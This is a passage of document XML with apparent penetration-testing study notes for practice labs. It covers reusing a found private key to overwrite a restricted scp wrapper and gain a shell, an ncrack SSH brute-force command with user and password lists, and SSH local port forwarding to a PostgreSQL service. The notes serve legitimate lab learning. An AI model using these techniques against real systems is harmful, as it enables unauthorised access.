    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">renu@debian</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → A comment, usually identifying who the key belongs to or where it was generated.</w:t>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t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MoneyBox </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG play, the comment was helpful since seeing "renu" in the comment hinted that "renu" (the currently compromised user) has the corresponding private key to this public key inside of authorized_keys, allowing us (renu) to SSH into this target user without password. </w:t>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ind w:left="-1170" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7461770" cy="1303418"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71" name="image74.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image74.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId256"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7461770" cy="1303418"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C96">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3519488" cy="1937394"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="460" name="image444.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image444.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId257"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3519488" cy="1937394"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one was from </w:t>
      </w:r>
      <w:hyperlink r:id="rId258">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sorcerer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found max's id_rsa keys and this authorized_keys file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen from the underlined section, This means when we connect as the user max to SSH </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can only execute commands that start with 'scp'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. As SCP runs over SSH we can use use id_rsa file from Max to connect and overwrite the wrapper file with something more useful such as 'bash' instead of 'scp'.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C99">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I edited the scp_wrapper.sh file to include the command 'bash' and changed the error message for troubleshooting purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3528037" cy="2084003"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="211" name="image210.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image210.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId259"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3528037" cy="2084003"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I then moved Max's 'id_rsa' key into my SSH folder on /home/kali/.ssh/ in preperation for connecting to SC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once completed connect by SCP and transfer over the wrapper file on our desktop to the max .ssh directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9vfgq5vqnomj" w:id="109"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce SSH with username and password list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ncrack -vvv ssh://192.168.213.125:22 -U users.txt -P passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a single username, use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a single password, use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_173ufmbqg9a0" w:id="110"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information about Local Port Forwarding can be found in XXXXXXXXX notes found </w:t>
      </w:r>
      <w:hyperlink r:id="rId260">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and in chapter "19.3.1. SSH Local Port Forwarding"</w:t>
      </w:r>
    </w:p>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t xml:space="preserve">What is Local Port Forwarding in SSH?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local port forwarding in SSH allows you to forward a port from a remote machine to your local machine through an encrypted SSH connection. This lets you access services on the remote machine (like PostgreSQL, which is only accessible locally) as if they were running on your local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In your case, you'll forward the PostgreSQL port (5432) from the remote machine to your local machine, so you can interact with it using tools like psql installed locally.</w:t>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t xml:space="preserve">How Local Port Forwarding Works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You Forward: A port on your local machine (e.g., localhost:5432).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To Target: A port on the remote machine (e.g., 127.0.0.1:5432 for PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the SSH connection is established, requests to your local port (e.g., localhost:5432) are securely forwarded to the remote machine's port.</w:t>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t xml:space="preserve">How to Set Up Local Port Forwarding</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Run the SSH Command with Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your local machine, run:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -L 5432:127.0.0.1:5432 christine@&lt;remote_ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Specifies the port forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The local port on your machine (you'll connect to this port). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can pick any port you want for this local port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it doesn't matter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The target port on the remote machine where PostgreSQL is listening.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">christine@&lt;remote_ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Replace &lt;remote_ip&gt; with the SSH address of the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Keep the SSH Session Open</w:t>
      </w:r>
    </w:p>
